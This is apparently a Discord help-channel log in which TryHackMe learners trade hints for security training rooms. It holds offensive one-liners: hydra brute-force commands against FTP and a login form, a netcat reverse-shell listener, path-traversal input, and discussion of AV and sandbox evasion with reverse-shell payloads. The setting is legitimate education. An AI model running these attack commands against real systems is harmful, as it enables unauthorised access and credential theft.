#room-hints
yes you're right , this is my last room for the day otherwise ill pull my hair out. and thank you for being patient with me. im not leet like some of yall but i try and learn
you don't want to load rockyou into burpsuite... the free version gets exponentially slower over time to prevent users from brute forcing with it. If you're using it for a room you likely have the wrong wordlist, and if you're just using it, you would probably be better off with a different tool
ok ty
Gave +1 Rep to @pallid moss
Any room in development with this: https://github.com/markakd/dirtycred ?
same question but asked in #room-ideas so lets wait and see
ah woops, wrong channel.. ok thanks
Gave +1 Rep to @alpine kestrel
So I'm doing the Linux PrivEsc room and when I try to ssh in I get this back. ----> Unable to negotiate with 10.10.124.190 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss
sniped by lassi again
No... I thought the whole reason for joining the THM discord was to ask questions here for help?
LOL... Ok then I did not know that.. Thanks..
Hello everyone I've just created my account and I'm starting the Jr pentester career, I'm actually at Web Application|content discovery|Manual Discovery - Framework Stack, I'm 99,9% sure i have given the good flag, after several tries I have finally checked on internet if my flag was the good one and I have also a positive answer, however it wont accept the flag. Would you have any hint about what should I do ? I tried to send a DM to THM and no success. Cheers
!docs verify
Can you put your flag in spoiler? Like this || <flag>||
What do you mean by 'in spoiler', just write the flag here in the pattern you mentioned or there is a spoiler group specific for that ?
Using spoiler will hide your flag before clicking
|| flag ||
OK, so what i basically did was to go to the site ACME IT and i added /tmp.zip in the url to download the zip file and inside I found the flag which is ||THM{KEEP_YOUR_SOFTWARE_UPDATED}||
Which room btw?
jr penetration test / introduction to web hacking / content discovery
Its incorrect flag for task Manual Discovery Framework Stack
ok thanks, i'll keep working
Re read the task.
Hm, would I be right in assuming that there's a docker escape needed in ohmywebserver after getting user?
Could someone give me a hint for the room Burp Suite Basics plz ?
I'm working on the question;
Take a look around the site on http://10.10.113.15/ -- we will be using this a lot throughout the module. Visit every page linked to from the homepage, then check your sitemap -- one endpoint should stand out as being very unusual!
Visit this in your browser (or use the "Response" section of the site map entry for that endpoint)
What is the flag you receive?
I've clicked on every single linked page and there's nothing showing in the site map that seems suspicious ?
This one took me a good few clicks.
@lucid junco I've clicked everything though......
I mean........ there is nothing left to click.
Is there a filter i might need to change or something @lucid junco ??
No, I just sat and clicked all the links, sometimes multiple times.
Right........ i've clicked everything though, this isn't making sense.
@lucid junco I think i found it........
<5yjR2GLcoGoij2ZK>
Is this the droid i'm looking for ?
i am new and totally confused.
what is the answer of what do you need to access for web applications
Click it and see.
Well, what do you think you need?
You should be able to click the end point in burp?
its a question in learning section of try hack me and not able to get the answer
it can be web browser or server
web browser is too ||long||
@lucid junco I have, there is no flag in there.
Visit the webpage in the browser?
Huh ?
task 8 john the ripper need help please haha
My hint was to you.
@lucid junco 404 not found.......
I assume you're not adding the < and > ?
still couldnt get the answer
What did you try?
web browser
It's too long
Count the number of * in the answer.
Is a clue to how long the and/or the answer format
Did you get it now?
thanks will try
Gave +1 Rep to @lucid junco
@lucid junco I have it now......... I had the URL typed incorrectly. Thanks.
Gave +1 Rep to @lucid junco
How does @green minnow decide when someone gets +1 Rep ?
just wondering if im on the right track for task 8 john the ripper ive tried --rule["A-Z"]
when you reply to someone saying "thanks" or "ty" or similar
What if i type, thanks @fresh grove .
@pallid moss Lol, thanks @pallid moss
it won't give anything now for 5 minutes since your last one
got the answer. it was browser and i was typing web browser
thanks
@pallid moss Oh right....... Can i give myself +1 rep by thanking myself ?
@tulip vortex Thanks.........
lol
don't think so
for which question? I think you're along the right lines
what rule would we use to add all capital letters to the end of the word
now im thinking its [List.rules:"cAZ"]
if it's regex based you'll need a $ at the end
I haven't done that one so it's really just something to consider
yeah cheers
Would someone give me a hint for the Quotient room plz ?
I mean...... Do i need to break out of the sage account into the Admin account ?
so, that's too long for the answer format. Look at what you need to do to "Append to the End of a Word", then add your "[A-Z]" on the end of it
first z should be lowercase, but yes
i need hint after getting into ssh shell as alice on room wonderland
i can see a python file with sudo perm as rabbit
any hint?
try to sudo -l and see what u can exploit with that given py file
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
there is a good write up that explain this exploit very well
for your security purpose i wont paste the link
||exploit the path of python library||
thanks bro let me try
Having some trouble trying to upgrade a reversed shell established via 2019-6714 (hackpark room)
Currently listening via msfconsole's multi/handler
certutils permissions seem to be barred for urlcache
0 feedback from powershell to check if a command is running, no luck thus far trying to pull from a local http server
Msfconsole upload - appears to be throttled to upload in 256b chunks and fails on the first chunk upload
(Attempts to send both an msfvenom payload exe and a netcat binary both failed)
Am i messing something up or is there an other means i should investigate?
(attempting a session upgrade via shell_to_meterpreter also failing)
Turns out powershell is very pedantic
was trying to wrap a command in brackets to enable doublequotes for strings, but it should have been doublequotes with single-quote for strings
100% it is
hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV 10.10.10.6 ftp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-08-26 15:36:14
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ftp://10.10.10.6:21/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[ATTEMPT] target 10.10.10.6 - login "dale" - pass "123456" - 1 of
should i wait for this to be over or go on and search for the answer
coz its basically bruteforcing
You get it? I did that room just the other day, so somewhat fresh in my mind.
I forgot........ I'm working on the Overpass room now.
Could someone give me a hint with the Overpass room plz ?
I'm trying this;
Cookies.set("SessionToken","anything")
I end up with this;
Uncaught ReferenceError: Cookies is not defined
<anonymous> debugger eval code:1
debugger eval code:1:9
Would someone plz give me a clue here, i'm not sure why this isn't working.......
Guys can someone give me a hint with this Question.
What would be the name of the machine account associated with a machine named TOM-PC?
|| cookies.set(SessionToken,"letmein") ||
I didn't need to use that........
It worked like this the second time i tried it;
Cookies.set("SessionToken","anything")
Great
hey @cold eagle would you help me trouble shoot something plz.........
I'm getting an error when doing the PrivEsc.........
where are you stuck at?
Thanks @cold eagle
Gave +1 Rep to @cold eagle
+rep
Any nudge on zeno room please, i'm stuck at the administrator login panel
You got the database?
Hello, could someone give me a hint for the room "https://tryhackme.com/room/subdomainenumeration#", last command it says to run "ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://MACHINE_IP -fs {size}", Edit the above command replacing {size} with the most occurring size value from the previous result and try it on the AttackBox, and according to them 2 results will be found, however all page sizes is 472, so when I type -fs 472 i have no answer I have only some lines that look like nothing for example ":: Progress: [453/1907] :: Job [1/1] :: 314 req/sec :: Duration: [0:: Progress: [454/1907] :: Job [1/1] :: 312 req/sec :: Duration: [0"
this is the ffuf results after using -fs 472
:: Method : GET
:: URL : http://10.10.29.136
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt
:: Header : Host: FUZZ.acmeitsupport.thm
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response size: 472
:: Progress: [1907/1907] :: Job [1/1] :: 403 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
Are you on your own machine or the attackbox?
attackbox
Looks to me you are using the wrong IP
Is this your attackbox IP that you are fuzzing ?
yep
Ye, then that's wrong.
You have to start the target machine of that room
😵‍💫 my bad,, thanks
Hi, I'm in the Firewalls room on task 1 and the last question is about allowing SNMP over SSH and which port should be permitted. I cant seem to find what port that should be, no material I've looked at has been any help
Nevermind I got it
was just about to refer you to some sources on it
Hello friends so here I am doing this python room but I keep submitting what I think should be the answer but I keep getting error so I'm thinking, maybe I might be wrong and someone out here can save my ass, I think the answer should be ^^requests.get*
But THM says hell no stop playing boy
i got stuck in enum stage on the room looking glass , i think there is a information disclosure vuln in ssh
(OpenSSH-7.6p1) any hint how to exploit it?
you mean the custom exploits?
Hi, I'm in room Firewalls Task 7 Port Tunneling. If I'm understanding the task correctly it wants me to set up a listener on the web server on port 8008 with a command to forward traffic to port 25. So I submitted the command and tried to connect to the listener via a terminal and it just sits in limbo. No connection time out or refusal
Gonna try reloading the server but I bet its something I'm doing wrong
there are so many ports are in open state and nmap show's service as ssh on every single port
Okay so I'm able to get a connection through ncat but I dont get a shell
And I can only get a connection from port 21, which is the previous task. It says port 8008 should work but its not for me
Okay I have a headache. Cant get the GET request to go through like I think it wants. Ill try later
why are you inputting the target machine ip in the command instead of the attack box ip into the command to catch it as a reverse shell???
Anyone able to give a hint on Enterprise? I have two users, can RDP into the DC, have gathered some useful info through the hound but simply can't figure out what I'm missing on the lateral movement here....
Also have found the secret files but haven't been able to decrypt them...
Nvm... I'm dumb... The vegetable helped me see what I was overlooking!
anyone know how to do last part of task 3 in intro to digital forensics. I cant do the last command to get the camera model for cat ransom
nvm
heya, need some help or hints for challenge 1 of the file inclusion room
||using burp to change GET to POST and tried ../../../../etc/flag1 but no response with the flag yet||
Try to use the right click function of burp to change GET to POST rather than changing it manually, this will automatically add a necessary header
A missing header
got it, thanks
Hey i am currently doing the "Linux Privilege Escalation" room. I have some problems with Task 7. There i need to escalate privileges with the SUID bit.
I tried GTFOBins but i do not find any working one. I also thought about cracking a password, but i cant read the /etc/shadow which i need for john the ripper. Does anybody can give me a hint?
Which binary you are using to read files?
Oh I didn't understand what they meant by using "local host" with the forwarding so I used the target IP again. Figured that out but that wasn't my only problem. Managed to find some obscure help online, not sure which fixed my problem but adding -nv to my nc argument on my machine and during the GET request changing the spelling of "default" to "defalt" which ever did it I got the page
I recommend to read man page of nc because normally when u nc $IP $PORT, it means that u are trying to connect to that but to get a reverse shell u need to listen for it not trying to reach it, and the common command that i always use is nc -lnvp $PORT
hmm okay, thanks i will have a look again
Gave +1 Rep to @burnt rivet
okay, i am dumb xD. I already saw and tried it, but i did not used a single brain cell^^. now i've got the task.
howdy folks. I'm in the /networkservices room, task 6 where I'm enumerating a telnet(?) server. Except nmap isn't working for me. I'm showing only closed ports, and when I try to run nmap -p- [IP] it just hangs. Any ideas?
I'm assuming I'm using the wrong options for nmap, but after trying for a few days I could use a tip.
sudo nmap -sS -p- -vv -T5 iphere
the verbose part will help a lot to see that nmap is actually doing something
the -T5 will speed up the scan immensely
the -sS part is redundant but why not include it anyways
ahh yes, seeing the remaining time is great, thanks a lot @alpine kestrel !
Gave +1 Rep to @alpine kestrel
no problem
and I've already found my first open port. That was clearly the ticket. Notes have been made for the future haha
is there any tip on when to use sudo with nmap? should i just always use it?
now that you found the open port you can do sudo nmap -sC -sV -vv -p portnumber ip
syn stealth scan instead of tcp connect scan is the main difference if you don't mess with a lot of options
right okay. I remember reading something about that needing direct socket access or something, i.e. needing elevated permissions. thanks times two @alpine kestrel
would recommend the nmap module to learn a lot of this: https://tryhackme.com/module/nmap
In this module, we will learn how to utilise the Nmap scanner to discover live hosts and scan them for open ports. You will gain a deep knowledge of the various Nmap port scans, from TCP connect and stealth (SYN) port scans to null, FIN, Xmas and idle host (zombie) port scans. We will explore in detail the advanced options, including packet fra...
well there is the further nmap room.... which is decent... then there is this module on nmap which has multiple rooms and goes even more in depth
Kenobi
I stuck here can someone give me clue how should i implement "mod_copy.py" rce to ftp server ?
Is it possible rce ?
@burnt rivet Thanks
Gave +1 Rep to @burnt rivet
Hey guys, I'm doing the Burp module (scoping and targeting task) and I'm instructed to add http://MACHINE_IP/ into scope and change the Proxy settings to only intercept traffic to in-scope targets so as to See the difference between the amount of traffic getting caught by the proxy before and after limiting the scope.
My question is:
Where can I see this difference? I've been moving back and forth between the dashboard, target, and proxy tabs but i don't see any changes in anything.
Have you started the machine, yes?
yes
Burp is def proxying traffic i just don't see how proxy > options > intercept client requests > and URL is in target scope is changing anything or where I am supposed to look for these changes.
Ah ok I get it now, I had to drop or forward the packets in order to see the other requests in the intercept queue facepalm
I was expecting to see a complete view of all requests being made.
Walking an application room, I need to find a flag in a directory, where can I find the directory?
I checked the sources but there isn't any file named flag.txt, am I doing something wrong?
You need to look in the directories.
So, in the room it is assumed that we know where the directory is? This was confusing even after searching on the internet, but thanks!
Gave +1 Rep to @dusk totem
u can check inspect tab (Source) or just brute force the directory
I checked the source but the flag wasn't there, thanks tho!
Gave +1 Rep to @languid isle
check|| /assets ||if u still haven't finished the room
In the room Chosen Undead I couldn't think of anything besides || typing the Sha-1 hashes of frampt and kaathe there respectively. || The collide button rings some bells as well but I don't have anything else, anyone got a clue?
I actually finished the room with the same hint. Although I didn't know this was a page in the site but where was it given that we have to check ||/assets||?
the things i always do to web site is brute force the directory so i just check every directory i found
but obviously as the name ||assets||, this should be a place to store stuff
Okay so that's why it was saying that the directory listing was enabled, so brute forcing it would give us all the directories available on the site I'm guessing?
yea mostly but in real world they can hide it ( i think)
but in lab environment, most likely u can brute force it if the name of the directories are in the wordlist that u use
unless they have random string name directory
Oh, I see, thanks!
Gave +1 Rep to @languid isle
hi
need help with a question.
An attacker has penetrated your organisation's security and stolen data. It is your task to return the organisation to business as usual. What incident response stage is this?
its the highest but its not the answer..
nvm got it
hello all I am doing Break Out The Cage machine,
and i found the following string "UWFwdyBFZWtjbCAtIFB2ciBSTUtQLi4uWFpXIFZXVVIuLi4gVFRJIFhFRi4uLiBMQUEgWlJHUVJPISEhIQpTZncuIEtham5tYiB4c2kgb3d1b3dnZQpGYXouIFRtbCBma2ZyIHFnc2VpayBhZyBvcWVpYngKR
Wxqd3guIFhpbCBicWkgYWlrbGJ5d3FlClJzZnYuIFp3ZWwgdnZtIGltZWwgc3VtZWJ0IGxxd2RzZmsKWWVqci4gVHFlbmwgVnN3IHN2bnQgInVycXNqZXRwd2JuIGVpbnlqYW11IiB3Zi4KCkl6IGdsd3cgQS
B5a2Z0ZWYuLi4uIFFqaHN2Ym91dW9leGNtdndrd3dhdGZsbHh1Z2hoYmJjbXlkaXp3bGtic2lkaXVzY3ds" ,and after base64 decoding it becomes the folloing:
Qapw Eekcl - Pvr RMKP...XZW VWUR... TTI XEF... LAA ZRGQRO!!!!
Sfw. Kajnmb xsi owuowge
Faz. Tml fkfr qgseik ag oqeibx
Eljwx. Xil bqi aiklbywqe
Rsfv. Zwel vvm imel sumebt lqwdsfk
Yejr. Tqenl Vsw svnt "urqsjetpwbn einyjamu" wf.
Iz glww A ykftef.... Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl
i have tried rot13 with rotations but no results, any help ?
rot47????
it becomes with characters and numbers, it doesn't work
It could be done with something else after.
figured it out
got the clear text of the above now
hint hint: ||Vigenere|| @sharp geode
it need a key for decoding, i am gonna look for it
if you can't find it try the brute force approach
i will try both ways, thanks a lot
no problem
any thoughts on this?
nope sorry no idea
also can't find that room when searching for it on tryhackme so either it is a private room or it was given to you for home work which means we should not really help you
i really appreciate your help, i brute force it and found the secret key using this website: https://www.boxentriq.com/code-breaking/vigenere-cipher
Good job you got it now
I dont think it is a private room as I just searched through subscription only challenge rooms that I have not completed and found it, nor do I think it is a homework since I didn't enroll in such educational programs
link to the room then???
but without your help, i could it doing easily, thanks again
Gave +1 Rep to @alpine kestrel
Gonna send it in a second
i couldn't *
that link will let shadow check if the room is private or not
no problem... shadow figured it out quick as it looked like some sort of cipher text and then tryhackme rarely does the very hard ones
wow I searched for it and didn't get any results as well, but luckily I could find it through an open tab
yeah that room is marked as private now
guess it is either getting archived and removed or updated
The room started pretty neat but not being able to get to the actual content because of incompetence in riddle solving kinda annoys me
well guess the room is not done yet and has yet to be released.... it is only 230 days old when most rooms are over 400 days old when they become public
That might be the case as well but I'm still craving for an answer for that riddle, though I'm probably gonna drop the room
well no writeups either so can't really help you without trying themselves and don't feel like doing that on a private room that has yet to be released
seems like that but thanks for the effort anyways
no problem
any hint on priv esc for MindGames room?
ive used linpeas
and got a public exploit
but it is not working as it needs ssh shell
despite generating ssh keys , ssh requires password
If it's a CVE, it's wrong
Whatever it is, it doesn't need ssh
i tried cve-||\2021-4034||
no other clues so far
also there is a executable in home users directory
and its being called by system
Linpeas will highlight it.
It's kinda like ||suid bit but a lot more granular.||
pwned it ,thanks
hey, i have a trouble in the msfRoom at msfvenom part
when the handler is set, i try to run the reverse-shell, but when i press enter key, the session close
any idea ?
hello everyone.
Tell me please
What are my first steps towards getting an NTLM hash in the Blueprint room?
Somehow a lot of information:
There is also a website on port ||8080||
There are SMB directories.
I can upload a file via SMB
I understand I need to catch a hash
||Responder|| (that's just through what)
But what should I do first?
Something should be simple and banal
which is clearly related to the resource on the site via port ||8080||
(a room from the easy series)
I'm in a stupor=)
hello all, I doing IDE room, and i found a login page on port 62337, and found a username say "alex" and got other information from Burp request, so i crafted a hydra brute force attack on the login page as following:
hydra -l alex -P /usr/share/wordlists/rockyou.txt 10.10.216.124 -s 62337 http-get-form "/index.php username=^USER^+&password=^PASS^&theme=default&language=en:f = invalid' -V"
but an error occurs: the variables argument needs at least the strings ^USER^, ^PASS^, ^USER64^ or ^PASS64^: f = invalid' -V
any help ?
sorry it's as follows: hydra -l john -P /usr/share/wordlists/rockyou.txt 10.10.216.124 -s 62337 http-get-form '/index.php username=^USER^+&password=^PASS^&theme=default&language=en' -V
Is it missing a colon to segment the index.php and username=^ params?
e.g.
http-get-form "/index.php:username=^USER^+&password=^PASS^&theme=default&language=en:<failure string>" -V
hello again, currently I am doing Dav room, only port open is 80, checked the source page and nothing useful, i found a directory /webdav but needs credentials , which there is no information about them what so ever, ideas ?
Can I get some help with the HOLO network. I am at task 36. For some reason mimikat wont run properly. I do have what I did documented. Any help
would be great.
probably larger chance to get help in the #holo-network channel for the network
roger that thanks jedi
Hi, I'm in Daily Bugle room but i can't find the Joomla version. Can someone give me a little hint ?
What setting name that allows you to modify the Host header in a Meterpreter payload?
Can't find it anywhere
i'm getting this error while connecting to ssh on lookingglass room
Unable to negotiate with 10.10.176.51 port 13789: no matching host key type found. Their offer: ssh-rsa
If you get an error saying Unable to negotiate with <IP> port 22: no matching host key type found. Their offer: ssh-rsa, ssh-dss this is because OpenSSH have deprecated ssh-rsa. Add -oHostKeyAlgorithms=+ssh-rsa to your command to connect.
I'll add a note to the room as well
Actually, @stuck fractal that's your room, are you happy if i put that as a hint?
ssh -oHostKeyAlgorithms=+ssh-dss -p 9100 10.10.176.51
Unable to negotiate with 10.10.176.51 port 9100: no matching host key type found. Their offer: ssh-rsa
rsa not dss
+rep @pallid moss
Gave +1 Rep to @pallid moss
No.
If they're capable of solving the room, they're capable of googling an error.
Ok
can anyone help me out with this question in https://tryhackme.com/room/passwordattacks ?
I am thinking of crunch 5 5 -t "THM@!" -o tryhackme.txt but it won't work. Thanks in advance.
It also should be "THM@\!" because ! is a special character, but the length of the answer should be 5
Thank! So tired I didn't even understand properly what it meant
Gave +1 Rep to @burnt rivet
https://tryhackme.com/room/introtoc2
completely stuck on task 7 question 2
What setting name that allows you to modify the Host header in a Meterpreter payload?
and the hint is less than worthless
nm i solved it
What LOLBAS (Living Off The Land Binaries and Scripts) tool does APT 41 use to aid in file transfers?
any hint on this
hi sandbox evasion task 4 last question. Which evasion technique involves burning compute-time to escape the sandbox?
any nudge
it should be named in the task content ๐
runtimedetectionevasion stuck on task 6 any hint why my code is not working
the term is not recognized
i dont understand i split the file shell.exe in the signature evasion but i cannot find the kibibyte any advice ?
i dont understand the question i think
kibibyte just refers to which 1000 bytes it's in, so if it was 33,283 bytes in, it'd be at 33000 when you round it.
oh okay
The number order?
It will be yeah, but you can brute force it
sorry for sending the same question in 2 channels
eeew brute forcing tryhackme answers
Yeah, the redesign will not be a soon thing.
ok thanks robert i was just having the not good kibibyte
if my file is considered already uploaded what can i do ?
you can scroll left and right in there
yes
the things highlighted in blue is what is being used.... the rest is just there to show other things that could be used @sage cloak
you can also scroll up and down
try rundll32 as the middle question answer
or you could check the att&ck framework for what the different thingies kinda mean
your emoji/emote names are so weird to shadow
Its just random numbers
Heart is for thanks, it was the answer inferno needed
The frog is inferno blush
you will get better at using mitre over time
the first question is basically just looking how many blue boxes there are under one of the groups of things
it is not 16 if that is what you tried... but if you scroll up and down when looking at that it should be obvious how many thingies there are under it
Can someone help me with Obfuscation Principles task 8? I got stuck on obfuscation.
Yeah , im there
if you check only the stuff that is below command and control.... how many blue boxes???
16 what the hack
yeah see there is only 2 blue coloured boxes
ah Multi is in both ss
that ??????????????????
What
Omg
Iam soo stupid
Enough try hack me for tonight
lmao
Thanks for the help shadow
no problem
+rep @alpine kestrel
Gave +1 Rep to @alpine kestrel
:)
you made shadow laugh.... that is a good reward
Glad to hear : )
hello guys
i was playing room/cyborgt8 , but i got stuck in privilege escalation, any hints..?
Hi! I'm doing the red team threat intel room on task 7. I cannot find where I'm supposed to get the last answer for the static website thing. Any hints are welcome
hey guys ,who know the command for connecting win via rdp in linux?
Hi there! So you're stuck on the Exfiltration/Impact technique?
Did you check out the different software being used on the APT41 page ?
Oh, the answer for the static site, nvm my answer then
Having the same issue!
Did you copy paste the flag or type it on your own ?
I typed it. It's a message box and I can't copy and paste it
Well then there might be a chance you are mixing i - I with l - L
Perhaps. I will try.
You were right. Doesn't look like it should be, but you were right. Many thanks!
Gave +1 Rep to @left thunder
Have anyone got the shell after successful av evasion in https://tryhackme.com/room/avevasionshellcode room. Task 2
have created and uploaded so many undetectable reverse shell payloads, av evasion is successful but somehow not getting shell back on my listener
If you're looking at the MITRE ATT&CK Navigator, if you scroll towards the right side of the screen there is a category for Exfiltration and another for Impact
This is what I've got so far but I can't for the life of me tell whats wrong
Am I basing it off of the wrong one? I'm going off of 41
This?
Yep, that! If you move all the way to the right you should see the sections you're looking for
Nothing I'm putting in is working am I just entering the wrong thing?
Are you entering highlighted techniques beneath the Exfiltration or Impact header?
The answers

Its been 30 minutes 
hi in case u did solve this
can u help me with this one
I haven't yet but it helps to look at the comparisons to see which section you need to look at
How come they both have the same IP address?
oh
just making this clear, all devices on a network use the same public IP address?
Not necessarily, but usually
This is part of NAT
Depends on network rules, and whether a reverse proxy is in place.
wow they giving misleading info in the rooms 😱
They aren't. As intro level material, it's normal to reduce the amount of real-world complications to make the content understandable.
yes i wasnt being fully serious dw
so what sorta thing would i put in my notes
"usually all devices on one network use the same public IP address"?
You're going to hate me for this but... They're your notes.
Understand the content, distill it.
gonna watch this video quickly https://www.youtube.com/watch?v=FTUV0t6JaDA
What is NAT? This is an animated video tutorial explaining how NAT works (network address translation). What's the difference between a public IP address and private IP address? What's the difference between IPv4 vs IPv6?
so i can maybe then understand to make better notes
.
im need help for that question
(What technique's purpose is to exploit the target's system to execute code?)
i really don't know how to pass it
what module are you in?
red team
read the chart again
under the column "purpose"
you'll find the answer
idk how to respond
like ned for execude the code right
nned
need*
the answer is on the chart
purpose
there's 3 columns. the middle column shows the question, word-for-word
on the chart*
if you ever get stuck, re-read
yeah i know but im not really good at eng
i have 15y did u think its too late if learn now basic staff?
what did u think
You are 15 years old ?
And you ask if it's too late ?
yeah idk when need to start
I'm 35. just started 6 months ago. you're never too old
as long as you're passionate about it and about learning/researching and reading.
you'll be fine
hard work
tireless work
i know but i want so hard
thx
start with the beginner modules
i already know the beginer staff like linux
oh good
i know how to cod im py
i would still definitely do the early modules though. it will engrain basic web technologies, networking and other concepts
i do it
like nmap and linux
its was easy but one my friend told me to do the red team
without them you'll quickly get lost when faced with techniques that are new to you
i haven't tried it yet so i don't know how hard or easy it is
aiming for OSCP. Hopefully some time next summer/autumn
common active directory exploits rn
bro what about that
(What is the first access type mentioned in the document?)
i re-read everything
can someone give me a nudge on "sandbox evasion" challenge?
I'm stuck on the Red team threat intel room task 7 question 2 and I have no clue where I'm supposed to be looking. Any hints?
can someone help me with Evading Logging and Monitoring Room I cant get the flag I remove all the logs and disable powershell login but I still get
I'm stuck with the file inclusion lab challenge 3. I can't seem to figure out how to get the path null-terminated and I haven't found out any other character to insert here by googling. The hint says it is using PHP $_REQUEST but it appears populating the variable with cookies have been turned off from the php configuration (which is the default setting) so I can't use that and I'm only able to use GET and POST
Hello, I'm doing the room Vulnet EndGame, I was able to dump the database but I'm stuck.
Any help please
hello everyone, I am doing Phishing Emails 5 room, and there is "challenge.eml" file to investigate it in a "Show View Split" machine, i tried to copy the content of the file, but it's too large to copy, and tried to wget python server on my machine and it also doesn't work
so can someone please send me the file, so i can do the challenge
Don't mind, I found something
i found a solution
passed the room
hey im need help for red team
(What is the first access type mentioned in the document?)
this is the question pls help me
I am also facing the same issue
Hello. I'm doing vulnnet endgame, I'm looking for the CMS but I wasn't able to find it.
Can I have a hint please?
@burnt rivet thank you
Gave +1 Rep to @burnt rivet
Just made me think of that haha ❤️
hahaha
but yeah keep at it brother, also check out some of the streamers that do this stuff... Lots of good insight / it's nice to feel part of a community
I am stuck on this room: https://tryhackme.com/room/passwordattacks
The question is: What would the syntax you would use to create a rule to produce the following: "S[Word]NN where N is Number and S is a symbol of !@?
The hint is: Az"[0-9][0-9]" ^[**] = Example: @password80
I know some regex and I've followed the room but I have no idea what that question even means.
||The hint is so close to the answer.||
Might be but I have been coming back to this one three days in a row now. Don't think I will solve it. What does the question mean? I do not understand the question tbh.
It's asking for you to create a rule.
I'm a little lost on inferno, I have the foothold but I can't work out how to get from foothold to user.
You got a log in?
Have you seen the ||poem|| ?
nothing screams out to me through linpeas.sh
the one on the main page of http?
or the many references to it
to answer your question, no.
||downloads||
Send a screenshot
The rule is supposed to be: ||^[!@?][aZ][0-9][0-9]$|| if I am not mistaken. But I fail to put it into john syntax
Look very closely at the hint.
I know I am, but it's punching me in the face.
OOOHH
sneaky.
IT WAS LITERALLY PUNCHING ME IN THE FACE
HOLY CRAP
I even tried to ssh-keygen my own user for www-data
Ok I got it. Face -> table. What a strange syntax.
Not going to befriend this one
Ty for the help.
Hello in active directory basics
In sub module managing users in AD
How can I access the Phillip's computer
rdp or the attackbox
or split view
Ok... have to admit... in the end I actually had to get it to finish the room. Touché.
Just know how to access other account whether from RDP or attackbox
both i guess
Have you completed that room named active directory basics
What was the flag found on Sophie's desktop?
To change the creds of sophie
We need to login as phillip
After that by using powershell phillip will change the Sophie's password
And after that in order to login to Sophie's desktop I need to know how can I firstly change my administrator account and login as phillip
After that how can I log in as Sophie in order to get that flag on that Try hack me windows machine
This is the question of active directory basics beginner path
Anyone stuck at evading loggin and monitoring ?
Can anyone help me with this
Just do what the task explained
Oke, can someone give me a hint on Obfuscation Principles, task 5, question 2 : What obfuscation layer aims to confuse an analyst by manipulating the code flow and abstract syntax trees?
See this explanation @exotic girder
I'm trying to do task 29 of the OWASP Top 10 room and I'm not quite sure what to exploit. I've looked at a few things, logged in as admin, found apache version and openssh version (with nmap) but I haven't found any exploits yet. Could someone give me a hint on where I should be looking?
did you search on google?
||I found that the site is made from a template from projectworlds. However, I can't seem to find exploits with the versions mentioned in the tutorial to make the app||
Is it online bookstore?
Yeah I've looked for every software with version I could find
Unless I should be looking for less specific stuff on exploit-db?
I think I've tried that exact script, the link is marked as already visited
But is that the one? I'll try it again
this is what it's giving me when I try it
bruh moment, I completely read over that part
Thanks @burnt rivet @cold eagle
Gave +1 Rep to @burnt rivet
thanks @cold eagle sorry for second ping but I gotta give you that rep 🦾
Gave +1 Rep to @cold eagle
Hi can I get a bit of assistance with room Kenobi Task 3. So I created and mounted the directory as it wanted me to and generally followed instructions before that now it wants me to cp and chmod a key named id_rsa and use it but I'm just a little turned around after mounting the directory and how to access the key through it
Hello, I'm working on Zeek Exercises, Task 3. Its asking what kind of file is associated with the malicious document. I finished the rest of task 3, but this eludes me. is it asking for a file type, or something else? ive tried a couple options that i thought were reasonable but none of the obvious to me answers are correct. Does anyone have any advice?
Any hint @solemn smelt
Please post your question and the room etc. in this channel as Metapoit described and be patient
Room: Blue
Task 5: Find Flags
URL: https://tryhackme.com/room/blue
flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.
Thanks
Gave +1 Rep to @topaz umbra
add the room name / url and task number. You will get help sooner if you make it easier for people
perfect
If there is an Admin user but I cant see it in the shell what does that mean?
I already have the highest privilege
I cant open the room atm because I'm working but it sounds like you should just look around a bit if you have done priv esc already
What's up with the
What is the name of the project that offers a transform based on ATT&CK?
question?
I thought I had it, but apparently I was wrong
Which room are you in?
Ffs
The correct answer is not the name of the project, but the company who makes it
Welp, at least I got it
lol
I don't get it why my answer is wrong tbh
also struggled with this one^^ wasn't that clear whats exactly wanted
Regarding to the task, what is the -t option doing ?
-t @,%^ Specifies a pattern, eg: @@god@@@@ where the only the @'s, ,'s, %'s, and ^'s will change. @ will insert lower case characters , will insert upper case characters % will insert numbers ^ will insert symbols
Wasn't asking about the man page, was asking about what the task mentioned?
If you're admin, have a look around some of the documents where you think admin will keep stuff?
Found the answer but had to brute-force. The question isn't clear to me:
What is the crunch command to generate a list containing THM@! and output to a file named tryhackme.txt?
THM should be static and @! should be found by placeholders for the answer
Right, that's why I was asking about what was mentioned about the -t option.
Since you haven't supplied a word that's going to be combined with the specific character set that you are providing.
Thus your wordlist would get way longer if you supply ,,, and makes the -t flag unnecessary
Guys, could you help me with this question (What type of logging will this method prevent?) this is Evading Logging and Monitoring room, task 9. I completed already all room but stuck on it
https://tryhackme.com/room/monitoringevasion
Check the text above the questions
yes i solved task 9
i am stuck on task 10
can anyone help me on task 10
Ah Lassi already got you I see
Hi guys! I'm in the room evading logging and monitoring task 10
Any of you knows how can I copy and paste the code to the windows sandbox?
I have only 3 task left to finish the Read Teaming Sandbox evasion task 5 , signature Evasion task 7( that code kill my eyes yesterday) 🤣
guys please help i cant find anything on the "walking an application" what ever the acme it support website im going to has nothing in the source
Might want to verify and show a screenshot
!docs verify
Hello, Can I DM you, I stuck here too
what is your question?
